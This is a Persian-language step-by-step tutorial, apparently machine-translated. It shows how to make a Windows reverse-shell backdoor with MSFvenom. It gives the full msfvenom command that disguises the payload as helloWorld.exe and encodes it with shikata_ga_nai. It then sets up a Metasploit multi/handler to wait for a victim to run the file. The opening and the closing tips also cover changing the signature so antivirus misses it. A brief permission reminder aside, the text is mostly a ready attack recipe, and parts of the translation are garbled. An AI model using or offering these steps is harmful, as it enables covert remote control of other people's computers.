در پشتی برای دور زدن مکانیزم های امنیتی ، اغلب مخفیانه و عمدتا غیرقابل تشخیص استفاده می شود. با استفاده از MSFvenom ، ترکیبی از msfpayload و msfencode ، می توان یک در پشتی ایجاد کرد که با استفاده از TCP معکوس پوسته به مهاجم متصل می شود. برای ایجاد یک در پشتی ، شما باید امضای بدافزار خود را تغییر دهید تا از هر گونه نرم افزار آنتی ویروس جلوگیری کنید. این پروژه را بر روی یک جفت کامپیوتر که اجازه دسترسی به آنها را دارید تکمیل کنید ، و در این فرایند ، با امنیت کامپیوتر و نحوه عملکرد این نوع درب پشت بیشتر آشنا می شوید.
مراحل
مرحله 1. Kali را راه اندازی کرده و کنسول ترمینال را روشن کنید
مرحله 2. ifconfig را تایپ کنید تا رابط نمایش داده شود و آدرس IP خود را بررسی کنید
مرحله 3. برای نمایش لیست رمزگذارها ، رمزگذارهای msfvenom -l را تایپ کنید
شما از x86/shikata_ga_nai به عنوان رمزگذار استفاده خواهید کرد
مرحله 4. "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -پنجره های پلت فرم معماری را برای استفاده تعیین می کند.
- -p windows/shell/reverse_tcp بارهای قابل جاسازی را تعیین می کند.
- LHOST آدرس IP شنونده را تعیین می کند.
- LPORT پورت شنونده را تعیین می کند.
- -b "\ x00" برای جلوگیری از نویسه بد (نایت بایت) تعیین می شود.
- -e x86/shikata_ga_nai نام رمزگذارها را تعیین می کند.
- -f exe> helloWorld.exe خروجی قالب را تعیین می کند.
مرحله 5. برای فعال کردن Metasploit ، msfconsole را تایپ کنید
اکنون شما در پشتی خود را ایجاد کرده اید. وقتی قربانی روی helloWorld.exe کلیک می کند ، بار پوسته ای که تعبیه شده است فعال می شود و به سیستم شما وصل می شود. برای دریافت اتصال ، باید مولتی هندلر را در Metasploit باز کرده و میزان بار را تنظیم کنید
مرحله 6. use use exploit/multi/handler را تایپ کنید
مرحله 7. مجموعه payload windows/shell/reverse_tcp را تایپ کنید
مرحله 8. گزینه های show را برای بررسی ماژول تایپ کنید
مرحله 9. مجموعه LHOST 192.168.48.129 را تایپ کنید
"LHOST" آدرس IP شنونده را تعیین می کند
مرحله 10. مجموعه LPORT 4444 را تایپ کنید
"LPORT" پورت شنونده را تعیین می کند
مرحله 11. نوع را اجرا کنید و منتظر اتصال دستگاه قربانی باشید
مرحله 12. منتظر بمانید تا قربانی روی helloWorld.exe کلیک کند
سپس با موفقیت به دستگاه قربانی متصل می شوید.
نکات
- استفاده از -i در MSFvenom نشان دهنده تکرارهای رمزگذاری است. گاهی اوقات تکرارهای بیشتر ممکن است به فرار از نرم افزار AV کمک کند.
- شما آموخته اید که چگونه با استفاده از MSFvenom در پشتی و کدگذاری کنید ، اما امروزه این روش در مقابل برخی از نرم افزارهای AV کاملاً کار نمی کند. دلیل این امر ، قالب های اجرایی در MSFvenom است. فروشندگان AV امضای ثابت این الگوها را اضافه کرده اند و فقط به دنبال آنها هستید. راه حل این مسئله استفاده از الگوی اجرایی متفاوت یا ابزارهای مختلف است.